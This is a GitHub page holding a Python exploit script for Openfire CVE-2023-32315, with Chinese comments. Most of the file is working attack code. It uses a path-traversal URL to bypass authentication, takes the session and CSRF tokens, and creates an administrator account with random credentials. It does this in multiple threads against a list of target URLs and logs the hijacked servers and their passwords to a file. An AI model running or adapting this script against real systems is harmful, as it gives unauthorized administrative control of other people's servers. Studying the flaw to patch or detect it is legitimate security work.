forked from VulnExpo/ExploitHunter
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathopenfire_CVE-2023-32315_exploit.py
97 lines (81 loc) · 3.62 KB
/
openfire_CVE-2023-32315_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
# 作者: VulnExpo
# 日期: 2023-10-23
import requests
import argparse
import threading
import httplib2
import random
import re
import string
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def generate_random_username(length=8):
return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
def generate_random_password(length=12):
return ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(length))
def check_for_vulnerability(url, proxies=None, success_file=None):
path = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp'
rsp_list = ''
http = httplib2.Http(disable_ssl_certificate_validation=True, proxy_info=None, timeout=10)
try:
response, content = http.request(url + path, method='GET')
for header_name, header_value in response.items():
rsp_list += header_value
if "csrf=" in rsp_list:
JSESSIONID = re.findall(r'JSESSIONID=(.*?);', rsp_list)[0]
csrf = re.findall(r'csrf=(.*?);', rsp_list)[0]
else:
return False
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
'Cookie': 'JSESSIONID={}; csrf={}'.format(JSESSIONID, csrf)
}
random_username = generate_random_username()
random_password = generate_random_password()
addpath = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={}&username={}&name=&email=&password={}&passwordConfirm={}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7'.format(
csrf, random_username, random_password, random_password)
add_user, content = http.request(url + addpath, method='GET', headers=headers)
if add_user.status == 200 and "at" in content.decode('utf-8'):
print(f"目标URL: {url} username: {random_username}, password: {random_password}")
with open(success_file, 'a') as s_file:
s_file.write(f"++++++++++++++++++\n")
s_file.write(f"目标URL: {url}\n")
s_file.write(f"响应内容: username: {random_username}, password: {random_password}\n\n")
return True
except Exception as e:
print(f"发生异常:{e}")
return False
def scan_targets(targets, proxies=None, success_file=None):
for target in targets:
target = target.strip()
check_for_vulnerability(target, proxies, success_file)
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
threads = []
for i in range(num_threads):
thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Openfire 身份认证绕过CVE-2023-32315")
parser.add_argument("-u", "--url", help="目标URL")
parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
args = parser.parse_args()
if not args.url and not args.file:
print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
exit(1)
if args.url:
urls = [args.url]
elif args.file:
with open(args.file, 'r') as file:
urls = file.readlines()
success_file = 'success_targets.txt'
proxies = {
"http": args.proxy,
"https": args.proxy
} if args.proxy else None
multi_threaded_scan(urls, proxies, success_file, args.threads)
print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。"